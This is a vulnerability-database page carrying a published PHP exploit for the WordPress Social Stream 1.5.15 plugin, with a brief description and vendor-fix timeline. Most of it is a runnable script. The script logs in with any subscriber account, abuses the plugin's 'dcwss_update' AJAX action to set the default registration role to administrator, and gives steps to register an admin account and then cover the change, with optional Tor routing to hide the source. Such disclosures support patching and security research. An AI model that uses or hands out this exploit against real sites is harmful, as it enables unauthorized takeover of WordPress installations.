Lucene search
K

WordPress Social Stream 1.5.15 Plugin - wp_options Overwrite

🗓️ 14 Jun 2016 00:00:00Reported by wp0DayType 
zdt
 zdt
🔗 0day.today👁 17 Views

WordPress Social Stream 1.5.15 Plugin wp_options Overwrite. Authenticated wp_options overwrite vulnerability on WordPress Social Stream 1.5.15 plugin allows unauthorized users to overwrite wp_options, enabling admin mode

Code
<?php
/**
 * Exploit Title: WordPress Social Stream  Exploit
 * Google Dork:
 * Exploit Author: wp0Day.com <[email protected]>
 * Vendor Homepage:
 * Software Link: http://codecanyon.net/item/wordpress-social-stream/2201708?s_rank=15
 * Version: 1.5.15
 * Tested on: Debian 8, PHP 5.6.17-3
 * Type: Authenticated wp_options overwrite
 * Time line: Found [14-May-2016], Vendor notified [14-May-2016], Vendor fixed: [v1.5.16 19/05/2016 (Current Version)],  [RD:1465606136]
 */
 
 
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
 
 
$options = getopt("t:m:u:p:f:c:",array('tor:'));
print_r($options);
$options = validateInput($options);
 
if (!$options){
    showHelp();
}
 
if ($options['tor'] === true)
{
    echo " ### USING TOR ###\n";
    echo "Setting TOR Proxy...\n";
    $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
    $curl->addOption(CURLOPT_PROXYTYPE,7);
    echo "Checking IPv4 Address\n";
    $curl->get('https://dynamicdns.park-your-domain.com/getip');
    echo "Got IP : ".$curl->getResponse()."\n";
    echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
    $answer = fgets(fopen ("php://stdin","r"));
    if(trim($answer) != 'wololo'){
        die("Aborting!\n");
    }
    echo "OK...\n";
}
 
 
function logIn(){
    global $curl, $options;
    file_put_contents('cookies.txt',"\n");
    $curl->setCookieFile('cookies.txt');
    $curl->get($options['t']);
    $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
    $curl->post($options['t'].'/wp-login.php', $data);
    $status =  $curl->getTransferInfo('http_code');
    if ($status !== 302){
        echo "Login probably failed, aborting...\n";
        echo "Login response saved to login.html.\n";
        die();
    }
    file_put_contents('login.html',$curl->getResponse());
 
 
}
 
function exploit(){
    global $curl, $options;
    if ($options['m'] == 'admin_on'){
        echo "\nEnabling Admin mode\n";
        $data = array('action'=>'dcwss_update', 'option_name'=>'default_role', 'option_value'=>'administrator' );
        $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
        $resp = $curl->getResponse();
        echo "Response: ". $resp."\n";
 
    }
    if ($options['m'] == 'admin_off'){
        echo "\nDisabling Admin mode\n";
        $data = array('action'=>'dcwss_update', 'option_name'=>'default_role', 'option_value'=>'subscriber' );
        $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
        $resp = $curl->getResponse();
        echo "Response: ". $resp."\n";
 
    }
}
 
 
logIn();
exploit();
 
 
 
function validateInput($options){
 
    if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
        return false;
    }
    if ( !isset($options['u']) ){
        return false;
    }
    if ( !isset($options['p']) ){
        return false;
    }
    if (!preg_match('~/$~',$options['t'])){
        $options['t'] = $options['t'].'/';
    }
    if (!isset($options['m']) || !in_array($options['m'], array('admin_on','admin_off') ) ){
        return false;
    }
    if ($options['m'] == 'r' && !isset($options['f'])){
        return false;
    }
    $options['tor'] = isset($options['tor']);
 
    return $options;
}
 
 
function showHelp(){
    global $argv;
    $help = <<<EOD
 
    WordPress Social Stream  Expoit Pack
 
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -m [MODE]
 
       *** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" **
 
       [TARGET_URL] http://localhost/wordpress/
       [MODE] admin_on - Sets default role on registration to Administrator
              admin_off - Sets default role on registration to Subscriber
 
Exploit Flow: Call the exploit with -m admin_on, and register a user manually.
              After registration call the exploit agiain with -m admin_off .
 
 
 
Examples:
       php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -m admin_on
 
    Misc:
           CURL Wrapper by Leonid Svyatov <[email protected]>
           @link http://github.com/svyatov/CurlWrapper
           @license http://www.opensource.org/licenses/mit-license.html MIT License
 
EOD;
    echo $help."\n\n";
    die();
}

#  0day.today [2018-03-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Jun 2016 00:00Current
7.1High risk
Vulners AI Score7.1
17